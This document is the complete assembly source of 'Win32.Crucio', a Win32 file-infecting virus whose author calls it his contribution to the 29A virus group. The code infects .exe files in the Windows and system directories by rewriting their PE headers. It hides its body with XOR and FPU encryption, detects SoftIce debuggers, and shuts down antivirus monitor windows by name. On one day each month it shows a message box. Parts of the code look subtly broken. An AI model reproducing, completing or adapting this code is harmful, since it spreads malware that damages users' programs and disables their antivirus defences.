;                  ²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²
;                   ccc   rrrr     u      u      ccc   i    oo
;                  c      r   r    u      u     c      i   o  o
;                 c       r    r   u      u    c       i  o    o
;                c        r   r    u      u   c        i o      o
;                c        rrrr     u      u   c        i o      o 
;                 c       r   r    u      u    c       i  o    o
;                  c      r    r    u    u      c      i   o  o
;                   ccc   r     r     uu         ccc   i    oo
;                  ²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²



;Win32.Crucio by powerdryv = Surya

;This was my very 1st of the viruses. Now, since I wanted to contribute
;to 29A, I value-added to this virus. The virus now is encrypted with a
;simple Sliding Key algorithm (XOR being the operation). For each dword
;being encrypted the Key increases by 4. After the XOR operation is per-
;formed the dword gets again encrypted thru an FPU instruction. The algo.
;used for encryption is simple. In the 1st step the dword gets squared, then
;it's added to itself and again it gets squared. So u see the simplicity.

;   Anti-Emulation : Yes, again using FPI
;   Anti-AV : Shuts down AV monitors
;   PayLoad : On every 25th of month shows a message box
;   Resident : No
;   Poly : No
;   Sets up SEH frames, (well that's a necessity)
                                                        

.586
.587
.model flat
jumps

extrn ExitProcess:proc
extrn MessageBoxA:proc

SizeOfVirus     equ     (offset EndOfVirus-StartOfVirus)/4
EncodedVirus    equ     (EEndOfVirus-EStartOfVirus)/4
SizeOne equ     (StartOfVirus-EStartOfVirus)/4

.data
szTitle   db      "Win32.Crucio by Surya",0

Message db      "In every color there's the light",13
        db      "In every stone sleeps a crystal",13
        db      "Remember the Shaman when he used to say:",13
        db      "Man is the dream of the dolphin.",0

SoftIce9x      db      "\\.\SICE",0
SoftIceNT      db      "\\.\NTSICE",0

.code
        StartOfVirus    label   byte

Start:	call Delta
Delta:	fnop
	pop ebp
	mov eax, offset Delta
        fild [ebp]
	fild [eax]
	fsub
	fabs
	fnop
	fistp dword ptr [Impy]
	mov ebp, Impy
	call CheckDebggers
	mov ecx, EncodedVirus
	lea edi, [ebp+EStartOfVirus]
	call Decoder
	jmp RealStart
Impy dd 0

RealStart:	
EStartOfVirus	label	byte
	
	mov esi, [esp]
	and esi, 0FFFF0000h
	mov ecx, 5

Check4MZ: 
	sub esi, 10000h
        	cmp word ptr [esi], "ZM"
	je Check4PE
        	loop Check4MZ
                	mov ecx, cs
                	xor cl, cl
                	jecxz WinNT
                	mov esi, 0BFF70000h
	jmp Check4PE
WinNT:
	mov esi, 077F00000h

Check4PE: cmp dword ptr [esi+80h], 'EP'
	jne Check4MZ
	mov dword ptr [ebp+@Kernel@], esi
	xchg eax, esi

        call SetSEH
	mov esp, [esp+8h]
	jmp ResSEH
SetSEH:
	push dword ptr fs:[0]
	mov fs:[0], esp


@1:	lea edi, [ebp+ApiOffsets]
        	lea esi, [ebp+ApiNames]
        	call GetApi
	call CloseAV

CheckDebggers2:
        	push 0
        	push 80h                 
        	push 3h            
        	push 0h
	push 1h
        	push 0C0000000h
        	push offset SoftIce9x
        	call [ebp+@CreateFileA@]
	inc eax
        	jnz Detected
        	dec eax

        	push 0
        	push 80h                 
        	push 3h            
        	push 0h
	push 1h
        	push 0C0000000h
        	push offset SoftIceNT
        	call [ebp+@CreateFileA@]
	inc eax
        	jnz Detected
        	dec eax

PayLoad:
	lea eax, [ebp+Samay]
	push eax
	call [ebp+@GetSystemTime@]
	cmp word ptr [ebp+S_wDay], 25h
	je Detected
	
	call MainInfection1
	call MainInfection2
ResSEH:
	pop dword ptr fs:[0]
	push 0
	call ExitProcess

MainInfection1:
	push 128
	lea eax, [ebp+offset windir]
	push eax
	mov eax, [ebp+offset @GetWindowsDirectoryA@]
	call eax

	push 128
	lea eax, [ebp+offset sysdir]
	push eax
	mov eax, [ebp+offset @GetSystemDirectoryA@]
	call eax

Return:	ret

MainInfection2:
@3:	lea eax, [ebp+windir]
	push eax
	call [ebp+@SetCurrentDirectoryA@]
	call FindThem
	jmp ResSEH
	
	lea eax, [ebp+sysdir]
	push eax
	call [ebp+@SetCurrentDirectoryA@]
	call FindThem
        jmp ResSEH

FindThem		proc
	lea eax, [ebp+Win32_Find_Data]
	push eax
	lea eax, [ebp+EXEtension]
	push eax
	call [ebp+@FindFirstFileA@]
	inc eax
	jz Failed2Find
	dec eax
	mov dword ptr [ebp+SearchHandle], eax

@@1:
	push dword ptr [ebp+OldEIP]
	push dword ptr [ebp+NewBase]
	call InfectThem
	pop dword ptr [ebp+NewBase]
	push dword ptr [ebp+OldEIP]
	
@@2:
	lea edi, [ebp+Win32_Find_Data]
	mov ecx, MAX_PATH
	xor al, al
	rep stosb

	lea eax, [ebp+Win32_Find_Data]
	push eax
	push dword ptr [ebp+EXEtension]
	call [ebp+@FindNextFileA@]
	test eax, eax
	jz Failed2Find
	jmp @@1
@@3:
	push dword ptr [ebp+SearchHandle]
	call [ebp+@FindClose@]

Failed2Find: ret
FindThem		endp

GetApi	proc

@_1:	push esi
	push edi
	call GetTheApis
	pop edi
	pop esi
	stosd
	xchg edi, esi
	xor al, al

@_2:	scasb
	jnz @_2
	xchg edi, esi

@_3:	cmp byte ptr [esi], 0BBh
	je Return2
	jmp @_1

Return2:	ret
GetApi	endp

GetTheApis      proc
	mov edx, esi
	mov edi, esi
	xor al, al
	
@@_1:	scasb
	jnz @@_1
	sub edi, esi
	mov ecx, edi

	xor eax, eax
	mov word ptr [ebp+Counter], ax
	mov esi, [ebp+@Kernel@]
	add esi, 3ch
	lodsw
        	add eax, [ebp+@Kernel@]
	mov esi, [eax+78h]
	add esi, 1ch
	add esi, [ebp+@Kernel@]
	lodsd
	add eax, [ebp+@Kernel@]
	mov dword ptr [ebp+@AddyTable@], eax
	lodsd
	add eax, [ebp+@Kernel@]
	push eax
	lodsd
	add eax, [ebp+@Kernel@]
        mov dword ptr [ebp+@OrdinalTable@], eax
	pop esi
	xor ebx,ebx

@@_2:	push esi
	lodsd
	add eax, [ebp+@Kernel@]
	mov esi, eax
	mov edi, edx
	push ecx
	cld
	rep cmpsb
	pop ecx
	jz @@_3
	pop esi
	add esi, 4
	inc ebx
	inc word ptr [ebp+Counter]
	jmp @@_2

@@_3:    	pop esi
	movzx eax, word ptr [ebp+Counter]
	shl eax, 1
	add eax, dword ptr [ebp+@OrdinalTable@]
	xor esi, esi
	xchg eax, esi
	lodsw
	shl eax, 2
	add eax, dword ptr [ebp+@AddyTable@]
	mov esi, eax
	lodsd
	add eax, [ebp+@Kernel@]
	ret
GetTheApis      endp

InfectThem	proc
        lea eax, [ebp+WFD_szFileName]
	push 80h
	push eax
	call [ebp+@SetFileAttributesA@]

	call OpenIt
	inc eax
	jz Failed2Open
	dec eax
	mov [ebp+FileHandle], eax	;dword ptr

	mov ecx, [ebp+WFD_nFileSizeLow]
        call CreateMapOfIt
	test eax, eax
	jz CantMap		;to Close the file
	mov [ebp+MapHandle], eax

	call MapIt
	test eax, eax
	jz UnmapIt
	mov [ebp+MapAddy], eax

	mov esi, [eax+3ch]
	add esi, eax
	cmp dword ptr [esi], 'EP'
	jne LeaveIt
	cmp dword ptr [esi+4ch], 'aea'	;Gaea
	jne LeaveIt

	push dword ptr [esi+3ch]
	push dword ptr [ebp+MapAddy]
	call [ebp+@CloseHandle@]
	pop ecx

        	mov eax, [ebp+WFD_nFileSizeLow]
	add eax, SizeOfVirus
        	call AlignIt
	xchg ecx, eax
	
	call CreateMapOfIt
	test eax, eax
	jz CantMap	;to Close the file
	
	mov [ebp+MapHandle], eax
	mov ecx, [ebp+NewSize]
	call MapIt
	test eax, eax
	jz UnmapIt
	mov [ebp+MapAddy], eax

	mov esi, [eax+3ch]
	add esi, eax
	mov [ebp+PEHeader], esi
	xor eax, eax	
	mov ax, word ptr [esi+6ch]	;
	dec eax
	imul eax, eax, 28h
	add esi, 78h
	add esi, eax
	mov ebx, [ebp+PEHeader+74h]
	shl ebx, 3
	add esi, ebx

	mov eax, [ebp+PEHeader+28h]
	mov [ebp+OldEIP], eax	;dword ptr
	mov eax, [ebp+PEHeader+34h]
	mov [ebp+NewBase], eax	;dword ptr

	mov ebx, [esi+10h]
	mov edx, ebx
	mov ebx, [esi+14h]
	push ebx
	mov edi, [ebp+PEHeader]

	mov eax, edx
	add eax, [esi+0ch]
	mov [edi+28h], eax
	mov dword ptr [ebp+NewEIP], eax
	
	mov eax, [esi+10h]
	add eax, SizeOfVirus
	mov ecx, [edi+3ch]
	call AlignIt
	
	mov [esi+10h], eax
	mov [esi+08h], eax
	pop ebx
	mov eax, [esi+10ch]
	add eax, [esi+0ch]
	mov [edi+50h], eax
	or dword ptr [esi+24h], 0A0000020h

	mov dword ptr [edi+4ch], 'aea'
	lea esi, [ebp+Start]
	mov edi, ebx
	add edi, dword ptr [ebp+MapAddy]
        mov ecx, SizeOne
	rep movsd

	mov ecx, EncodedVirus
	lea esi, [ebp+RealStart]
	call RandomNo
	mov [ebp+EncKey], eax
	finit

Loop1:	xor esi, [ebp+EncKey]
	add [ebp+EncKey], 4h

	fild dword ptr [esi]
	fild dword ptr [esi]
	fmul
	fadd st, st
	fistp dword ptr [ebx]
	fild dword ptr [ebx]
	fild dword ptr [ebx]
	fmul
	fistp dword ptr [esi]

	movsd
	add esi, 4h
	loop Loop1
	lea esi, [ebp+Decoder]
	mov ecx, (Ending-Decoder)/4

Loop3:
	movsd
	add esi, 4h
        loop Loop3
	jmp UnmapIt
	
LeaveIt:
	call TruncateIt
UnmapIt:
	push dword ptr [ebp+MapAddy]
	call [ebp+@UnmapViewOfFile@]

	push dword ptr [ebp+MapHandle]
	call [ebp+@CloseHandle@]
CantMap:
	push dword ptr [ebp+FileHandle]
	call [ebp+@CloseHandle@]
	jmp ResSEH

Detected:
        	push    0                      
                        push    offset szTitle     
        	push    offset Message
        	push    00h
        	call    MessageBoxA                     
	push 0
	call ExitProcess

Failed2Open:
	push dword ptr [ebp+WFD_dwFileAttributes]
        	lea eax, [ebp+WFD_szFileName] 
	push eax
	call [ebp+@SetFileAttributesA@]
	ret
InfectThem		endp

AlignIt   proc
	push ebx
	xor ebx, ebx
	push eax
	div ecx
	pop eax
	sub ecx, ebx
	add eax, ecx
	pop ebx
	ret
AlignIt   endp

CreateMapOfIt	proc
	push 0
	push ecx
	push 0
	push 4h
	push dword ptr [ebp+FileHandle]
	call [ebp+@CreateFileMappingA@]
	ret
CreateMapOfIt	endp

MapIt	proc
	push ecx
	push 0
	push 0
	push 2h
	push dword ptr [ebp+MapHandle]
	call [ebp+@MapViewOfFile@]
	ret
MapIt	endp

OpenIt	proc
	push 0
	push 0
	push 3h	
	push 0
	push 1h
	push 80000000h or 40000000h
	push eax
	call [ebp+@CreateFileA@]
	ret
OpenIt	endp

TruncateIt      proc
	push 0
	push 0
	push ecx
	push dword ptr [ebp+FileHandle]
	call [ebp+@SetFilePointer@]	
        	push dword ptr [ebp+FileHandle]
	call [ebp+@SetEndOfFile@]
	ret
TruncateIt      endp

RandomNo		proc	
        	db 0fh, 31h
	mov [ebp+Ran0], eax
	call [ebp+@GetTickCount@]
	mov [ebp+Ran1], eax
	call [ebp+@GetTickCount@]
	mov [ebp+Ran2], eax
	call [ebp+@GetTickCount@]
	mov [ebp+Ran3], eax
	add eax, [ebp+Ran1]
        	call ClDoer
	ror eax, cl
	add eax, [ebp+Ran0]
	shl eax, 7h
	call ClDoer
	rol eax, cl
	add eax, [ebp+Ran2]
	sub eax, [ebp+Ran3]
	call ClDoer
	ror eax, cl
        mov [ebp+EncKey], eax
        ret

ClDoer  proc near
        in al, 40h
        mov cl, al 
        ret
ClDoer  endp
RandomNo		endp

CloseAV		proc
        	lea eax, [ebp+AVList]
Loop2:
	call CloseAVs
	xor al, al
	scasb
	jnz $-1
        cmp byte ptr [edi], 0BBh
	jnz Loop2
	ret
CloseAV		endp

CloseAVs		proc
	push edi
	push 0
	call [ebp+@FindWindowA@]
	test eax, eax
	jz Return3

	push 0
	push 0
	push 12h
	push eax
	call [ebp+@PostMessageA@]
	xor cl, cl
	org $-1
Return3:
	ret
CloseAVs		endp

	db	"I inspire.....",0

ApiNames                 label   byte
@FindFirstFileA	db	"FindFirstFileA",0
@FindNextFileA	db	"FindNextFileA",0
@FindClose	db	"FindClose",0
@CreateFileA	db	"CreateFileA",0
@SetFilePointer	db	"SetFilePointer",0
@SetFileAttributesA	db	"SetFileAttributesA",0
@CloseHandle	db	"CloseHandle",0
@GetCurrentDirectoryA	db	"GetCurrentDirectoryA",0
@SetCurrentDirectoryA	db	"SetCurrentDirectoryA",0
@GetWindowsDirectoryA	db	"GetWindowsDirectoryA",0
@GetSystemDirectoryA	db	"GetSystemDirectoryA",0
@CreateFileMappingA		db	"CreateFileMappingA",0
@MapViewOfFile	db	"MapViewOfFile",0
@UnmapViewOfFile	db	"UnmapViewOfFile",0
@SetEndOfFile	db	"SetEndOfFile",0
@GetTickCount	db	"GetTickCount",0
@GetSystemTime	db	"GetSystemTime",0
@FindWindowA	db	"FindWindowA",0
@PostMessageA	db	"PostMessageA",0
                        db      0BBh

AVList	label	byte
	db      "AVP Monitor",0
	db      "Amon Antivirus Monitor",0
	db      "McAfee Scan",0	
	db      0BBh


EXEtension              db      '*.exe',0
@Kernel@        dd      00000000h
EncKey          dd      00000000h

@Start@		dd	00000000h
@AddyTable@	dd	00000000h	
@OrdinalTable@	dd	00000000h
FileHandle		dd	00000000h
SearchHandle	dd	00000000h
MapHandle	dd	00000000h
MapAddy		dd	00000000h
PEHeader		dd	00000000h
NewEIP		dd	00000000h
NewSize         dd      00000000h
Counter         dw      0000h

ApiOffsets		label   byte
@FindFirstFileA@	dd	0
@FindNextFileA@	dd	0
@FindClose@             dd              0
@CreateFileA@          dd              0
@SetFilePointer@	dd              0
@SetFileAttributesA@		dd	0
@CloseHandle@	dd	0
@GetCurrentDirectoryA@	dd	0
@SetCurrentDirectoryA@	dd	0
@GetWindowsDirectoryA@	dd	0
@GetSystemDirectoryA@	dd	0
@CreateFileMappingA@	dd	0
@MapViewOfFile@		dd	0
@UnmapViewOfFile@	dd      	0
@SetEndOfFile@ 	dd	0
@GetTickCount@	dd	0
@GetSystemTime@	dd	0
@FindWindowA@	dd	0
@PostMessageA@	dd	0

Ran1    dd      0
Ran2    dd      0
Ran0    dd      0
Ran3    dd      0

MAX_PATH                equ     260

FILETIME                STRUC
FT_dwLowDateTime        dd      ?
FT_dwHighDateTime       dd      ?
FILETIME                ENDS

Win32_Find_Data         label   byte
WFD_dwFileAttributes    dd      ?
WFD_ftCreationTime      FILETIME ?
WFD_ftLastAccessTime    FILETIME ?
WFD_ftLastWriteTime     FILETIME ?
WFD_nFileSizeHigh       dd      ?
WFD_nFileSizeLow        dd      ?
WFD_dwReserved0         dd      ?
WFD_dwReserved1         dd      ?
WFD_szFileName          db      MAX_PATH dup (?)
WFD_szAlternateFileName db      13 dup (?)
                        db      03 dup (?)

Samay              label   byte
S_wYear		dw	?
S_wMonth		dw	?
S_wDayOfWeek	dw	?
S_wDay		dw	?
S_wHour		dw	?
S_wMinute		dw	?
S_wSecond	dw	?
S_wMilliseconds	dw	?


sysdir	db	128h dup(0)
windir	db	128h dup(0)
curdir	db	128h dup(0)

OldEIP	dd	0
NewBase	dd	0

	EEndOfVirus	label	byte

Decoder	proc	
	test ebp, ebp
	jz EndDecod
	mov eax, dword [ebp+EncKey]
	mov ebx, 2h
	finit
Looploopy:
	mov edx, dword ptr [edi]

	fild dword ptr [edx]
	fsqrt
	fistp dword ptr [Var1]
	fild dword ptr [ebx]
	fild dword ptr [Var1]
	fdiv
	fsqrt
	
	xor edx, eax
	add eax, 4h
	mov dword ptr [edi], edx
	add edi, 4
	loop Looploopy
EndDecod: ret

CheckDebggers:
	mov ecx, fs:[20h]
	jecxz EndDecod
	mov dword ptr [ebp+EncKey], -1
	ret
Decoder endp

Var1 dd 0

        EndOfVirus      label   byte

Ending:	end Start

;			I inspire....